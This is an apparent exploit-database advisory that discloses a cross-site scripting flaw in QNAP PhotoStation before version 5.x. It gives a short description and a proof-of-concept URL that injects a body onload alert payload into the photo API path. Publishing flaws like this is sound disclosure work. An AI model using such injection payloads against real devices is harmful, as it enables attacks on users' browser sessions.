QNAP PhotoStation versions prior to 5.x suffer from a cross site scripting vulnerability.
05f5de9d0cbcfeb0b09d981b2c4c7cc6
# Exploit QNAP PhotoStation < 5.x Cross-Site Scripting
# Date: 5/22/2018
# Exploit Author: SaeedReza Zamanian
# Software Link: https://www.qnap.com/en/app_center/con_show.php?op=showone&internalName=PhotoStation&version=5.7.0&down_1_name=TS-251&jump_win=1&qts=4.3.4&seq=120
# Vendor Home Page: https://www.qnap.com
# Tested On: Unix
# Contact: https://www.linkedin.com/in/penetrationtest/
1. Description
Parameter Validation is not implemented correctly in this applicaton, so attackers can implement XSS attack on this webapp.
2. Proof of Concept
https://[Site]:4443/photo/api/inde%3Cbody%20onload=alert('XSSED');%3E.php